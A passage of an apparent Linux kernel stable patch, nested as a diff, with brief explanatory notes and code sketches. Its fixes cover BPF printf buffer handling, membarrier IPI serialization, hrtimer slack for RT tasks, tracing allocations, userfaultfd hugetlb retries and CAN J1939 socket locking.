+  * allocated and bpf_bprintf_cleanup should be called to free them after use.
+  */
+ int bpf_bprintf_prepare(char *fmt, u32 fmt_size, const u64 *raw_args,
+-			u32 **bin_args, u32 num_args)
++			u32 num_args, struct bpf_bprintf_data *data)
+ {
++	bool get_buffers = (data->get_bin_args && num_args) || data->get_buf;
+ 	char *unsafe_ptr = NULL, *tmp_buf = NULL, *tmp_buf_end, *fmt_end;
++	struct bpf_bprintf_buffers *buffers = NULL;
+ 	size_t sizeof_cur_arg, sizeof_cur_ip;
+ 	int err, i, num_spec = 0;
+ 	u64 cur_arg;
+@@ -817,14 +821,19 @@ int bpf_bprintf_prepare(char *fmt, u32 fmt_size, const u64 *raw_args,
+ 		return -EINVAL;
+ 	fmt_size = fmt_end - fmt;
+ 
+-	if (bin_args) {
+-		if (num_args && try_get_fmt_tmp_buf(&tmp_buf))
+-			return -EBUSY;
++	if (get_buffers && try_get_buffers(&buffers))
++		return -EBUSY;
+ 
+-		tmp_buf_end = tmp_buf + MAX_BPRINTF_BUF_LEN;
+-		*bin_args = (u32 *)tmp_buf;
++	if (data->get_bin_args) {
++		if (num_args)
++			tmp_buf = buffers->bin_args;
++		tmp_buf_end = tmp_buf + MAX_BPRINTF_BIN_ARGS;
++		data->bin_args = (u32 *)tmp_buf;
+ 	}
+ 
++	if (data->get_buf)
++		data->buf = buffers->buf;
++
+ 	for (i = 0; i < fmt_size; i++) {
+ 		if ((!isprint(fmt[i]) && !isspace(fmt[i])) || !isascii(fmt[i])) {
+ 			err = -EINVAL;
+@@ -1018,31 +1027,33 @@ int bpf_bprintf_prepare(char *fmt, u32 fmt_size, const u64 *raw_args,
+ 	err = 0;
+ out:
+ 	if (err)
+-		bpf_bprintf_cleanup();
++		bpf_bprintf_cleanup(data);
+ 	return err;
+ }
+ 
+ BPF_CALL_5(bpf_snprintf, char *, str, u32, str_size, char *, fmt,
+-	   const void *, data, u32, data_len)
++	   const void *, args, u32, data_len)
+ {
++	struct bpf_bprintf_data data = {
++		.get_bin_args	= true,
++	};
+ 	int err, num_args;
+-	u32 *bin_args;
+ 
+ 	if (data_len % 8 || data_len > MAX_BPRINTF_VARARGS * 8 ||
+-	    (data_len && !data))
++	    (data_len && !args))
+ 		return -EINVAL;
+ 	num_args = data_len / 8;
+ 
+ 	/* ARG_PTR_TO_CONST_STR guarantees that fmt is zero-terminated so we
+ 	 * can safely give an unbounded size.
+ 	 */
+-	err = bpf_bprintf_prepare(fmt, UINT_MAX, data, &bin_args, num_args);
++	err = bpf_bprintf_prepare(fmt, UINT_MAX, args, num_args, &data);
+ 	if (err < 0)
+ 		return err;
+ 
+-	err = bstr_printf(str, str_size, fmt, bin_args);
++	err = bstr_printf(str, str_size, fmt, data.bin_args);
+ 
+-	bpf_bprintf_cleanup();
++	bpf_bprintf_cleanup(&data);
+ 
+ 	return err + 1;
+ }
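
The reshaped API follows one calling pattern everywhere: declare a struct bpf_bprintf_data stating which per-CPU resources are wanted, prepare, consume, clean up. A hedged sketch of that pattern; demo_render() and its arguments are illustrative:

	static int demo_render(char *out, u32 out_size, char *fmt,
			       const u64 *raw_args, u32 num_args)
	{
		struct bpf_bprintf_data data = {
			.get_bin_args	= true,	/* want the sanitized binary varargs */
		};
		int err;

		err = bpf_bprintf_prepare(fmt, UINT_MAX, raw_args, num_args, &data);
		if (err < 0)
			return err;

		err = bstr_printf(out, out_size, fmt, data.bin_args);

		bpf_bprintf_cleanup(&data);	/* releases the per-CPU nesting slot */
		return err;
	}

Because cleanup now keys off what was actually handed out, a verification-only call (both flags false) needs no cleanup bookkeeping at all.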
+diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
+index 23b6d57b5eef2..1a29ac4db6eae 100644
+--- a/kernel/bpf/verifier.c
++++ b/kernel/bpf/verifier.c
+@@ -7448,6 +7448,7 @@ static int check_bpf_snprintf_call(struct bpf_verifier_env *env,
+ 	struct bpf_reg_state *fmt_reg = &regs[BPF_REG_3];
+ 	struct bpf_reg_state *data_len_reg = &regs[BPF_REG_5];
+ 	struct bpf_map *fmt_map = fmt_reg->map_ptr;
++	struct bpf_bprintf_data data = {};
+ 	int err, fmt_map_off, num_args;
+ 	u64 fmt_addr;
+ 	char *fmt;
+@@ -7472,7 +7473,7 @@ static int check_bpf_snprintf_call(struct bpf_verifier_env *env,
+ 	/* We are also guaranteed that fmt+fmt_map_off is NULL terminated, we
+ 	 * can focus on validating the format specifiers.
+ 	 */
+-	err = bpf_bprintf_prepare(fmt, UINT_MAX, NULL, NULL, num_args);
++	err = bpf_bprintf_prepare(fmt, UINT_MAX, NULL, num_args, &data);
+ 	if (err < 0)
+ 		verbose(env, "Invalid format string\n");
+ 
+diff --git a/kernel/sched/membarrier.c b/kernel/sched/membarrier.c
+index 0c5be7ebb1dca..08b16d20c85bb 100644
+--- a/kernel/sched/membarrier.c
++++ b/kernel/sched/membarrier.c
+@@ -161,6 +161,9 @@
+ 	| MEMBARRIER_PRIVATE_EXPEDITED_SYNC_CORE_BITMASK		\
+ 	| MEMBARRIER_PRIVATE_EXPEDITED_RSEQ_BITMASK)
+ 
++static DEFINE_MUTEX(membarrier_ipi_mutex);
++#define SERIALIZE_IPI() guard(mutex)(&membarrier_ipi_mutex)
++
+ static void ipi_mb(void *info)
+ {
+ 	smp_mb();	/* IPIs should be serializing but paranoid. */
+@@ -258,6 +261,7 @@ static int membarrier_global_expedited(void)
+ 	if (!zalloc_cpumask_var(&tmpmask, GFP_KERNEL))
+ 		return -ENOMEM;
+ 
++	SERIALIZE_IPI();
+ 	cpus_read_lock();
+ 	rcu_read_lock();
+ 	for_each_online_cpu(cpu) {
+@@ -346,6 +350,7 @@ static int membarrier_private_expedited(int flags, int cpu_id)
+ 	if (cpu_id < 0 && !zalloc_cpumask_var(&tmpmask, GFP_KERNEL))
+ 		return -ENOMEM;
+ 
++	SERIALIZE_IPI();
+ 	cpus_read_lock();
+ 
+ 	if (cpu_id >= 0) {
+@@ -459,6 +464,7 @@ static int sync_runqueues_membarrier_state(struct mm_struct *mm)
+ 	 * between threads which are users of @mm has its membarrier state
+ 	 * updated.
+ 	 */
++	SERIALIZE_IPI();
+ 	cpus_read_lock();
+ 	rcu_read_lock();
+ 	for_each_online_cpu(cpu) {
+diff --git a/kernel/time/hrtimer.c b/kernel/time/hrtimer.c
+index 8e0aff1d1ea4f..9bb88836c42e6 100644
+--- a/kernel/time/hrtimer.c
++++ b/kernel/time/hrtimer.c
+@@ -2266,7 +2266,7 @@ void __init hrtimers_init(void)
+ /**
+  * schedule_hrtimeout_range_clock - sleep until timeout
+  * @expires:	timeout value (ktime_t)
+- * @delta:	slack in expires timeout (ktime_t)
++ * @delta:	slack in expires timeout (ktime_t) for SCHED_OTHER tasks
+  * @mode:	timer mode
+  * @clock_id:	timer clock to be used
+  */
+@@ -2293,6 +2293,13 @@ schedule_hrtimeout_range_clock(ktime_t *expires, u64 delta,
+ 		return -EINTR;
+ 	}
+ 
++	/*
++	 * Override any slack passed by the user if under
++	 * RT constraints.
++	 */
++	if (rt_task(current))
++		delta = 0;
++
+ 	hrtimer_init_sleeper_on_stack(&t, clock_id, mode);
+ 	hrtimer_set_expires_range_ns(&t.timer, *expires, delta);
+ 	hrtimer_sleeper_start_expires(&t, mode);
+@@ -2312,7 +2319,7 @@ EXPORT_SYMBOL_GPL(schedule_hrtimeout_range_clock);
+ /**
+  * schedule_hrtimeout_range - sleep until timeout
+  * @expires:	timeout value (ktime_t)
+- * @delta:	slack in expires timeout (ktime_t)
++ * @delta:	slack in expires timeout (ktime_t) for SCHED_OTHER tasks
+  * @mode:	timer mode
+  *
+  * Make the current task sleep until the given expiry time has
+@@ -2320,7 +2327,8 @@ EXPORT_SYMBOL_GPL(schedule_hrtimeout_range_clock);
+  * the current task state has been set (see set_current_state()).
+  *
+  * The @delta argument gives the kernel the freedom to schedule the
+- * actual wakeup to a time that is both power and performance friendly.
++ * actual wakeup to a time that is both power and performance friendly
++ * for regular (non RT/DL) tasks.
+  * The kernel gives the normal best-effort behavior for "@expires+@delta",
+  * but may decide to fire the timer earlier, though never earlier than @expires.
+  *
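
For callers, the effect is that @delta is now advisory only for SCHED_OTHER tasks; an RT task gets a precise wakeup no matter what slack it passes. A hedged usage sketch:

	/* sleep ~10ms with 1ms of slack; under an RT policy the kernel now
	 * forces the slack to 0 and honours @expires exactly */
	static int demo_wait(void)
	{
		ktime_t to = ktime_add_ms(ktime_get(), 10);

		set_current_state(TASK_INTERRUPTIBLE);
		return schedule_hrtimeout_range(&to, NSEC_PER_MSEC, HRTIMER_MODE_ABS);
	}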
+diff --git a/kernel/trace/bpf_trace.c b/kernel/trace/bpf_trace.c
+index f4a494a457c52..3fdde232eaa92 100644
+--- a/kernel/trace/bpf_trace.c
++++ b/kernel/trace/bpf_trace.c
+@@ -368,8 +368,6 @@ static const struct bpf_func_proto *bpf_get_probe_write_proto(void)
+ 	return &bpf_probe_write_user_proto;
+ }
+ 
+-static DEFINE_RAW_SPINLOCK(trace_printk_lock);
+-
+ #define MAX_TRACE_PRINTK_VARARGS	3
+ #define BPF_TRACE_PRINTK_SIZE		1024
+ 
+@@ -377,23 +375,22 @@ BPF_CALL_5(bpf_trace_printk, char *, fmt, u32, fmt_size, u64, arg1,
+ 	   u64, arg2, u64, arg3)
+ {
+ 	u64 args[MAX_TRACE_PRINTK_VARARGS] = { arg1, arg2, arg3 };
+-	u32 *bin_args;
+-	static char buf[BPF_TRACE_PRINTK_SIZE];
+-	unsigned long flags;
++	struct bpf_bprintf_data data = {
++		.get_bin_args	= true,
++		.get_buf	= true,
++	};
+ 	int ret;
+ 
+-	ret = bpf_bprintf_prepare(fmt, fmt_size, args, &bin_args,
+-				  MAX_TRACE_PRINTK_VARARGS);
++	ret = bpf_bprintf_prepare(fmt, fmt_size, args,
++				  MAX_TRACE_PRINTK_VARARGS, &data);
+ 	if (ret < 0)
+ 		return ret;
+ 
+-	raw_spin_lock_irqsave(&trace_printk_lock, flags);
+-	ret = bstr_printf(buf, sizeof(buf), fmt, bin_args);
++	ret = bstr_printf(data.buf, MAX_BPRINTF_BUF, fmt, data.bin_args);
+ 
+-	trace_bpf_trace_printk(buf);
+-	raw_spin_unlock_irqrestore(&trace_printk_lock, flags);
++	trace_bpf_trace_printk(data.buf);
+ 
+-	bpf_bprintf_cleanup();
++	bpf_bprintf_cleanup(&data);
+ 
+ 	return ret;
+ }
+@@ -426,30 +423,29 @@ const struct bpf_func_proto *bpf_get_trace_printk_proto(void)
+ 	return &bpf_trace_printk_proto;
+ }
+ 
+-BPF_CALL_4(bpf_trace_vprintk, char *, fmt, u32, fmt_size, const void *, data,
++BPF_CALL_4(bpf_trace_vprintk, char *, fmt, u32, fmt_size, const void *, args,
+ 	   u32, data_len)
+ {
+-	static char buf[BPF_TRACE_PRINTK_SIZE];
+-	unsigned long flags;
++	struct bpf_bprintf_data data = {
++		.get_bin_args	= true,
++		.get_buf	= true,
++	};
+ 	int ret, num_args;
+-	u32 *bin_args;
+ 
+ 	if (data_len & 7 || data_len > MAX_BPRINTF_VARARGS * 8 ||
+-	    (data_len && !data))
++	    (data_len && !args))
+ 		return -EINVAL;
+ 	num_args = data_len / 8;
+ 
+-	ret = bpf_bprintf_prepare(fmt, fmt_size, data, &bin_args, num_args);
++	ret = bpf_bprintf_prepare(fmt, fmt_size, args, num_args, &data);
+ 	if (ret < 0)
+ 		return ret;
+ 
+-	raw_spin_lock_irqsave(&trace_printk_lock, flags);
+-	ret = bstr_printf(buf, sizeof(buf), fmt, bin_args);
++	ret = bstr_printf(data.buf, MAX_BPRINTF_BUF, fmt, data.bin_args);
+ 
+-	trace_bpf_trace_printk(buf);
+-	raw_spin_unlock_irqrestore(&trace_printk_lock, flags);
++	trace_bpf_trace_printk(data.buf);
+ 
+-	bpf_bprintf_cleanup();
++	bpf_bprintf_cleanup(&data);
+ 
+ 	return ret;
+ }
+@@ -471,23 +467,25 @@ const struct bpf_func_proto *bpf_get_trace_vprintk_proto(void)
+ }
+ 
+ BPF_CALL_5(bpf_seq_printf, struct seq_file *, m, char *, fmt, u32, fmt_size,
+-	   const void *, data, u32, data_len)
++	   const void *, args, u32, data_len)
+ {
++	struct bpf_bprintf_data data = {
++		.get_bin_args	= true,
++	};
+ 	int err, num_args;
+-	u32 *bin_args;
+ 
+ 	if (data_len & 7 || data_len > MAX_BPRINTF_VARARGS * 8 ||
+-	    (data_len && !data))
++	    (data_len && !args))
+ 		return -EINVAL;
+ 	num_args = data_len / 8;
+ 
+-	err = bpf_bprintf_prepare(fmt, fmt_size, data, &bin_args, num_args);
++	err = bpf_bprintf_prepare(fmt, fmt_size, args, num_args, &data);
+ 	if (err < 0)
+ 		return err;
+ 
+-	seq_bprintf(m, fmt, bin_args);
++	seq_bprintf(m, fmt, data.bin_args);
+ 
+-	bpf_bprintf_cleanup();
++	bpf_bprintf_cleanup(&data);
+ 
+ 	return seq_has_overflowed(m) ? -EOVERFLOW : 0;
+ }
+diff --git a/kernel/trace/ring_buffer.c b/kernel/trace/ring_buffer.c
+index 1285e7fb597ee..e019a9278794f 100644
+--- a/kernel/trace/ring_buffer.c
++++ b/kernel/trace/ring_buffer.c
+@@ -1095,7 +1095,7 @@ __poll_t ring_buffer_poll_wait(struct trace_buffer *buffer, int cpu,
+ 		full = 0;
+ 	} else {
+ 		if (!cpumask_test_cpu(cpu, buffer->cpumask))
+-			return -EINVAL;
++			return EPOLLERR;
+ 
+ 		cpu_buffer = buffer->buffers[cpu];
+ 		work = &cpu_buffer->irq_work;
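
The fix encodes a general rule: a __poll_t handler must report failure through EPOLL* bits, never a negative errno, because the return value is consumed as a bitmask. A hedged sketch with a hypothetical device:

	struct demo_dev { wait_queue_head_t wq; bool ready; };	/* hypothetical */

	static __poll_t demo_poll(struct file *file, poll_table *wait)
	{
		struct demo_dev *dev = file->private_data;

		if (!dev)
			return EPOLLERR;	/* not -EINVAL: a negative errno corrupts the mask */

		poll_wait(file, &dev->wq, wait);
		return dev->ready ? (EPOLLIN | EPOLLRDNORM) : 0;
	}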
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index 2b3c4cd8382b3..f667d6bdddda5 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -40,6 +40,7 @@
+ #include <linux/ctype.h>
+ #include <linux/init.h>
+ #include <linux/panic_notifier.h>
++#include <linux/kmemleak.h>
+ #include <linux/poll.h>
+ #include <linux/nmi.h>
+ #include <linux/fs.h>
+@@ -2249,7 +2250,7 @@ struct saved_cmdlines_buffer {
+ 	unsigned *map_cmdline_to_pid;
+ 	unsigned cmdline_num;
+ 	int cmdline_idx;
+-	char *saved_cmdlines;
++	char saved_cmdlines[];
+ };
+ static struct saved_cmdlines_buffer *savedcmd;
+ 
+@@ -2263,47 +2264,60 @@ static inline void set_cmdline(int idx, const char *cmdline)
+ 	strncpy(get_saved_cmdlines(idx), cmdline, TASK_COMM_LEN);
+ }
+ 
+-static int allocate_cmdlines_buffer(unsigned int val,
+-				    struct saved_cmdlines_buffer *s)
++static void free_saved_cmdlines_buffer(struct saved_cmdlines_buffer *s)
+ {
++	int order = get_order(sizeof(*s) + s->cmdline_num * TASK_COMM_LEN);
++
++	kfree(s->map_cmdline_to_pid);
++	kmemleak_free(s);
++	free_pages((unsigned long)s, order);
++}
++
++static struct saved_cmdlines_buffer *allocate_cmdlines_buffer(unsigned int val)
++{
++	struct saved_cmdlines_buffer *s;
++	struct page *page;
++	int orig_size, size;
++	int order;
++
++	/* Figure out how much is needed to hold the given number of cmdlines */
++	orig_size = sizeof(*s) + val * TASK_COMM_LEN;
++	order = get_order(orig_size);
++	size = 1 << (order + PAGE_SHIFT);
++	page = alloc_pages(GFP_KERNEL, order);
++	if (!page)
++		return NULL;
++
++	s = page_address(page);
++	kmemleak_alloc(s, size, 1, GFP_KERNEL);
++	memset(s, 0, sizeof(*s));
++
++	/* Round up to actual allocation */
++	val = (size - sizeof(*s)) / TASK_COMM_LEN;
++	s->cmdline_num = val;
++
+ 	s->map_cmdline_to_pid = kmalloc_array(val,
+ 					      sizeof(*s->map_cmdline_to_pid),
+ 					      GFP_KERNEL);
+-	if (!s->map_cmdline_to_pid)
+-		return -ENOMEM;
+-
+-	s->saved_cmdlines = kmalloc_array(TASK_COMM_LEN, val, GFP_KERNEL);
+-	if (!s->saved_cmdlines) {
+-		kfree(s->map_cmdline_to_pid);
+-		return -ENOMEM;
++	if (!s->map_cmdline_to_pid) {
++		free_saved_cmdlines_buffer(s);
++		return NULL;
+ 	}
+ 
+ 	s->cmdline_idx = 0;
+-	s->cmdline_num = val;
+ 	memset(&s->map_pid_to_cmdline, NO_CMDLINE_MAP,
+ 	       sizeof(s->map_pid_to_cmdline));
+ 	memset(s->map_cmdline_to_pid, NO_CMDLINE_MAP,
+ 	       val * sizeof(*s->map_cmdline_to_pid));
+ 
+-	return 0;
++	return s;
+ }
+ 
+ static int trace_create_savedcmd(void)
+ {
+-	int ret;
+-
+-	savedcmd = kmalloc(sizeof(*savedcmd), GFP_KERNEL);
+-	if (!savedcmd)
+-		return -ENOMEM;
++	savedcmd = allocate_cmdlines_buffer(SAVED_CMDLINES_DEFAULT);
+ 
+-	ret = allocate_cmdlines_buffer(SAVED_CMDLINES_DEFAULT, savedcmd);
+-	if (ret < 0) {
+-		kfree(savedcmd);
+-		savedcmd = NULL;
+-		return -ENOMEM;
+-	}
+-
+-	return 0;
++	return savedcmd ? 0 : -ENOMEM;
+ }
+ 
+ int is_tracing_stopped(void)
+@@ -5972,26 +5986,14 @@ tracing_saved_cmdlines_size_read(struct file *filp, char __user *ubuf,
+ 	return simple_read_from_buffer(ubuf, cnt, ppos, buf, r);
+ }
+ 
+-static void free_saved_cmdlines_buffer(struct saved_cmdlines_buffer *s)
+-{
+-	kfree(s->saved_cmdlines);
+-	kfree(s->map_cmdline_to_pid);
+-	kfree(s);
+-}
+-
+ static int tracing_resize_saved_cmdlines(unsigned int val)
+ {
+ 	struct saved_cmdlines_buffer *s, *savedcmd_temp;
+ 
+-	s = kmalloc(sizeof(*s), GFP_KERNEL);
++	s = allocate_cmdlines_buffer(val);
+ 	if (!s)
+ 		return -ENOMEM;
+ 
+-	if (allocate_cmdlines_buffer(val, s) < 0) {
+-		kfree(s);
+-		return -ENOMEM;
+-	}
+-
+ 	preempt_disable();
+ 	arch_spin_lock(&trace_cmdline_lock);
+ 	savedcmd_temp = savedcmd;
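
Two details of the new allocator generalize beyond tracing: pages from alloc_pages() are invisible to kmemleak unless registered by hand, and a power-of-two page allocation can round the requested capacity up for free. The same pattern in isolation, with hypothetical names:

	static void *demo_alloc(size_t want, size_t *got)
	{
		int order = get_order(want);
		struct page *page = alloc_pages(GFP_KERNEL, order);

		if (!page)
			return NULL;

		*got = PAGE_SIZE << order;	/* hand back the rounded-up size */
		kmemleak_alloc(page_address(page), *got, 1, GFP_KERNEL);
		return page_address(page);
	}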
+diff --git a/kernel/trace/trace_events_trigger.c b/kernel/trace/trace_events_trigger.c
+index 918730d749325..f941ce01ee351 100644
+--- a/kernel/trace/trace_events_trigger.c
++++ b/kernel/trace/trace_events_trigger.c
+@@ -1455,8 +1455,10 @@ register_snapshot_trigger(char *glob,
+ 			  struct event_trigger_data *data,
+ 			  struct trace_event_file *file)
+ {
+-	if (tracing_alloc_snapshot_instance(file->tr) != 0)
+-		return 0;
++	int ret = tracing_alloc_snapshot_instance(file->tr);
++
++	if (ret < 0)
++		return ret;
+ 
+ 	return register_trigger(glob, data, file);
+ }
+diff --git a/lib/mpi/ec.c b/lib/mpi/ec.c
+index 40f5908e57a4f..e16dca1e23d52 100644
+--- a/lib/mpi/ec.c
++++ b/lib/mpi/ec.c
+@@ -584,6 +584,9 @@ void mpi_ec_init(struct mpi_ec_ctx *ctx, enum gcry_mpi_ec_models model,
+ 	ctx->a = mpi_copy(a);
+ 	ctx->b = mpi_copy(b);
+ 
++	ctx->d = NULL;
++	ctx->t.two_inv_p = NULL;
++
+ 	ctx->t.p_barrett = use_barrett > 0 ? mpi_barrett_init(ctx->p, 0) : NULL;
+ 
+ 	mpi_ec_get_reset(ctx);
+diff --git a/mm/page-writeback.c b/mm/page-writeback.c
+index de5f69921b946..d3e9d12860b9f 100644
+--- a/mm/page-writeback.c
++++ b/mm/page-writeback.c
+@@ -1526,7 +1526,7 @@ static inline void wb_dirty_limits(struct dirty_throttle_control *dtc)
+ 	 */
+ 	dtc->wb_thresh = __wb_calc_thresh(dtc);
+ 	dtc->wb_bg_thresh = dtc->thresh ?
+-		div_u64((u64)dtc->wb_thresh * dtc->bg_thresh, dtc->thresh) : 0;
++		div64_u64(dtc->wb_thresh * dtc->bg_thresh, dtc->thresh) : 0;
+ 
+ 	/*
+ 	 * In order to avoid the stacked BDI deadlock we need
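
The substitution matters because div_u64() takes a 32-bit divisor: once the threshold no longer fits in u32, the old code silently divided by the truncated low bits. A small illustration of the difference:

	u64 a = 100ULL << 32;
	u64 b = (10ULL << 32) | 3;	/* low 32 bits are just 3 */

	div_u64(a, (u32)b);	/* divides by 3, not by b: silently wrong */
	div64_u64(a, b);	/* full 64-by-64 division: 9 */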
+diff --git a/mm/userfaultfd.c b/mm/userfaultfd.c
+index 650ab6cfd5f49..992a0a16846f7 100644
+--- a/mm/userfaultfd.c
++++ b/mm/userfaultfd.c
+@@ -327,6 +327,7 @@ static __always_inline ssize_t __mcopy_atomic_hugetlb(struct mm_struct *dst_mm,
+ 					      unsigned long dst_start,
+ 					      unsigned long src_start,
+ 					      unsigned long len,
++					      atomic_t *mmap_changing,
+ 					      enum mcopy_atomic_mode mode,
+ 					      bool wp_copy)
+ {
+@@ -445,6 +446,15 @@ static __always_inline ssize_t __mcopy_atomic_hugetlb(struct mm_struct *dst_mm,
+ 				goto out;
+ 			}
+ 			mmap_read_lock(dst_mm);
++			/*
++			 * If memory mappings are changing because of a non-cooperative
++			 * operation (e.g. mremap) running in parallel, bail out and
++			 * request the user to retry later.
++			 */
++			if (mmap_changing && atomic_read(mmap_changing)) {
++				err = -EAGAIN;
++				break;
++			}
+ 
+ 			dst_vma = NULL;
+ 			goto retry;
+@@ -480,6 +490,7 @@ extern ssize_t __mcopy_atomic_hugetlb(struct mm_struct *dst_mm,
+ 				      unsigned long dst_start,
+ 				      unsigned long src_start,
+ 				      unsigned long len,
++				      atomic_t *mmap_changing,
+ 				      enum mcopy_atomic_mode mode,
+ 				      bool wp_copy);
+ #endif /* CONFIG_HUGETLB_PAGE */
+@@ -601,8 +612,8 @@ static __always_inline ssize_t __mcopy_atomic(struct mm_struct *dst_mm,
+ 	 */
+ 	if (is_vm_hugetlb_page(dst_vma))
+ 		return  __mcopy_atomic_hugetlb(dst_mm, dst_vma, dst_start,
+-					       src_start, len, mcopy_mode,
+-					       wp_copy);
++					       src_start, len, mmap_changing,
++					       mcopy_mode, wp_copy);
+ 
+ 	if (!vma_is_anonymous(dst_vma) && !vma_is_shmem(dst_vma))
+ 		goto out_unlock;
+diff --git a/net/can/j1939/j1939-priv.h b/net/can/j1939/j1939-priv.h
+index 16af1a7f80f60..31a93cae5111b 100644
+--- a/net/can/j1939/j1939-priv.h
++++ b/net/can/j1939/j1939-priv.h
+@@ -86,7 +86,7 @@ struct j1939_priv {
+ 	unsigned int tp_max_packet_size;
+ 
+ 	/* lock for j1939_socks list */
+-	spinlock_t j1939_socks_lock;
++	rwlock_t j1939_socks_lock;
+ 	struct list_head j1939_socks;
+ 
+ 	struct kref rx_kref;
+@@ -301,6 +301,7 @@ struct j1939_sock {
+ 
+ 	int ifindex;
+ 	struct j1939_addr addr;
++	spinlock_t filters_lock;
+ 	struct j1939_filter *filters;
+ 	int nfilters;
+ 	pgn_t pgn_rx_filter;
+diff --git a/net/can/j1939/main.c b/net/can/j1939/main.c
+index ecff1c947d683..a6fb89fa62785 100644
+--- a/net/can/j1939/main.c
++++ b/net/can/j1939/main.c
+@@ -274,7 +274,7 @@ struct j1939_priv *j1939_netdev_start(struct net_device *ndev)
+ 		return ERR_PTR(-ENOMEM);
+ 
+ 	j1939_tp_init(priv);
+-	spin_lock_init(&priv->j1939_socks_lock);
++	rwlock_init(&priv->j1939_socks_lock);
+ 	INIT_LIST_HEAD(&priv->j1939_socks);
+ 
+ 	mutex_lock(&j1939_netdev_lock);
+diff --git a/net/can/j1939/socket.c b/net/can/j1939/socket.c
+index b0be23559243c..58909b36561a6 100644
+--- a/net/can/j1939/socket.c
++++ b/net/can/j1939/socket.c
+@@ -80,16 +80,16 @@ static void j1939_jsk_add(struct j1939_priv *priv, struct j1939_sock *jsk)
+ 	jsk->state |= J1939_SOCK_BOUND;
+ 	j1939_priv_get(priv);
+ 
+-	spin_lock_bh(&priv->j1939_socks_lock);
++	write_lock_bh(&priv->j1939_socks_lock);
+ 	list_add_tail(&jsk->list, &priv->j1939_socks);
+-	spin_unlock_bh(&priv->j1939_socks_lock);
++	write_unlock_bh(&priv->j1939_socks_lock);
+ }
+ 
+ static void j1939_jsk_del(struct j1939_priv *priv, struct j1939_sock *jsk)
+ {
+-	spin_lock_bh(&priv->j1939_socks_lock);
++	write_lock_bh(&priv->j1939_socks_lock);
+ 	list_del_init(&jsk->list);
+-	spin_unlock_bh(&priv->j1939_socks_lock);
++	write_unlock_bh(&priv->j1939_socks_lock);
+ 
+ 	j1939_priv_put(priv);
+ 	jsk->state &= ~J1939_SOCK_BOUND;
+@@ -262,12 +262,17 @@ static bool j1939_sk_match_dst(struct j1939_sock *jsk,
+ static bool j1939_sk_match_filter(struct j1939_sock *jsk,
+ 				  const struct j1939_sk_buff_cb *skcb)
+ {
+-	const struct j1939_filter *f = jsk->filters;
+-	int nfilter = jsk->nfilters;
++	const struct j1939_filter *f;
++	int nfilter;
++
++	spin_lock_bh(&jsk->filters_lock);
++
++	f = jsk->filters;
++	nfilter = jsk->nfilters;
+ 
+ 	if (!nfilter)
+ 		/* receive all when no filters are assigned */
+-		return true;
++		goto filter_match_found;
+ 
+ 	for (; nfilter; ++f, --nfilter) {
+ 		if ((skcb->addr.pgn & f->pgn_mask) != f->pgn)
+@@ -276,9 +281,15 @@ static bool j1939_sk_match_filter(struct j1939_sock *jsk,
+ 			continue;
+ 		if ((skcb->addr.src_name & f->name_mask) != f->name)
+ 			continue;
+-		return true;
++		goto filter_match_found;
+ 	}
++
++	spin_unlock_bh(&jsk->filters_lock);
+ 	return false;
++
++filter_match_found:
++	spin_unlock_bh(&jsk->filters_lock);
++	return true;
+ }
+ 
+ static bool j1939_sk_recv_match_one(struct j1939_sock *jsk,
+@@ -329,13 +340,13 @@ bool j1939_sk_recv_match(struct j1939_priv *priv, struct j1939_sk_buff_cb *skcb)
+ 	struct j1939_sock *jsk;
+ 	bool match = false;
+ 
+-	spin_lock_bh(&priv->j1939_socks_lock);
++	read_lock_bh(&priv->j1939_socks_lock);
+ 	list_for_each_entry(jsk, &priv->j1939_socks, list) {
+ 		match = j1939_sk_recv_match_one(jsk, skcb);
+ 		if (match)
+ 			break;
+ 	}
+-	spin_unlock_bh(&priv->j1939_socks_lock);
++	read_unlock_bh(&priv->j1939_socks_lock);
+ 
+ 	return match;
+ }
+@@ -344,11 +355,11 @@ void j1939_sk_recv(struct j1939_priv *priv, struct sk_buff *skb)
+ {
+ 	struct j1939_sock *jsk;
+ 
+-	spin_lock_bh(&priv->j1939_socks_lock);
++	read_lock_bh(&priv->j1939_socks_lock);
+ 	list_for_each_entry(jsk, &priv->j1939_socks, list) {
+ 		j1939_sk_recv_one(jsk, skb);
+ 	}
+-	spin_unlock_bh(&priv->j1939_socks_lock);
++	read_unlock_bh(&priv->j1939_socks_lock);
+ }
+ 
+ static void j1939_sk_sock_destruct(struct sock *sk)
+@@ -401,6 +412,7 @@ static int j1939_sk_init(struct sock *sk)
+ 	atomic_set(&jsk->skb_pending, 0);
+ 	spin_lock_init(&jsk->sk_session_queue_lock);
+ 	INIT_LIST_HEAD(&jsk->sk_session_queue);
++	spin_lock_init(&jsk->filters_lock);
+ 
+ 	/* j1939_sk_sock_destruct() depends on SOCK_RCU_FREE flag */
+ 	sock_set_flag(sk, SOCK_RCU_FREE);
+@@ -703,9 +715,11 @@ static int j1939_sk_setsockopt(struct socket *sock, int level, int optname,
+ 		}
+ 
+ 		lock_sock(&jsk->sk);
++		spin_lock_bh(&jsk->filters_lock);
+ 		ofilters = jsk->filters;
+ 		jsk->filters = filters;
+ 		jsk->nfilters = count;
++		spin_unlock_bh(&jsk->filters_lock);
+ 		release_sock(&jsk->sk);
+ 		kfree(ofilters);
+ 		return 0;
+@@ -1080,12 +1094,12 @@ void j1939_sk_errqueue(struct j1939_session *session,
+ 	}
+ 
+ 	/* spread RX notifications to all sockets subscribed to this session */
+-	spin_lock_bh(&priv->j1939_socks_lock);
++	read_lock_bh(&priv->j1939_socks_lock);
+ 	list_for_each_entry(jsk, &priv->j1939_socks, list) {
+ 		if (j1939_sk_recv_match_one(jsk, &session->skcb))
+ 			__j1939_sk_errqueue(session, &jsk->sk, type);
+ 	}
+-	spin_unlock_bh(&priv->j1939_socks_lock);
++	read_unlock_bh(&priv->j1939_socks_lock);
+ };
+ 
+ void j1939_sk_send_loop_abort(struct sock *sk, int err)
+@@ -1273,7 +1287,7 @@ void j1939_sk_netdev_event_netdown(struct j1939_priv *priv)
+ 	struct j1939_sock *jsk;
+ 	int error_code = ENETDOWN;
+ 
+-	spin_lock_bh(&priv->j1939_socks_lock);
++	read_lock_bh(&priv->j1939_socks_lock);
+ 	list_for_each_entry(jsk, &priv->j1939_socks, list) {
+ 		jsk->sk.sk_err = error_code;
+ 		if (!sock_flag(&jsk->sk, SOCK_DEAD))
+@@ -1281,7 +1295,7 @@ void j1939_sk_netdev_event_netdown(struct j1939_priv *priv)
